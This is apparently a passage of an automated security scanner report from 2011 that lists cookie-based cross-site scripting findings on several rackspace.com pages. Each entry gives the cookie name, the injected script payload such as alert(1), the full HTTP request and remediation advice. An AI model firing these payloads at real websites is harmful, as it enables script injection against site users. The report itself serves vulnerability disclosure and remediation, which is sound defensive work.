Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f82f363"%3balert(1)//61f905e706c; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 66637
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb86"%3balert(1)//aa7e9c65c0f was submitted in the chatslider cookie. This input was echoed as 3eb86";alert(1)//aa7e9c65c0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3eb86"%3balert(1)//aa7e9c65c0f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44bd7"><script>alert(1)</script>eeb60002408 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D44bd7"><script>alert(1)</script>eeb60002408; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3549"><script>alert(1)</script>c2105beaa0e was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/sharepoint.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d3549"><script>alert(1)</script>c2105beaa0e; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36dfa"%3balert(1)//68d567f16e3 was submitted in the IS_UASrackuid cookie. This input was echoed as 36dfa";alert(1)//68d567f16e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f836dfa"%3balert(1)//68d567f16e3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:10:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46001
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69a1"><script>alert(1)</script>65527c5ab6d was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c69a1"><script>alert(1)</script>65527c5ab6d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df198"><script>alert(1)</script>8f0f6bdf54a was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ddf198"><script>alert(1)</script>8f0f6bdf54a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8425"%3balert(1)//93a7591f9a was submitted in the chatslider cookie. This input was echoed as f8425";alert(1)//93a7591f9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/security/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df8425"%3balert(1)//93a7591f9a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb463"%3balert(1)//61c78126c9b was submitted in the IS_UASrackuid cookie. This input was echoed as bb463";alert(1)//61c78126c9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bb463"%3balert(1)//61c78126c9b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b330"><script>alert(1)</script>c80e5f2feb3 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f85b330"><script>alert(1)</script>c80e5f2feb3; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b585"%3balert(1)//a4502608eeb was submitted in the chatslider cookie. This input was echoed as 2b585";alert(1)//a4502608eeb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/storage/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2b585"%3balert(1)//a4502608eeb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
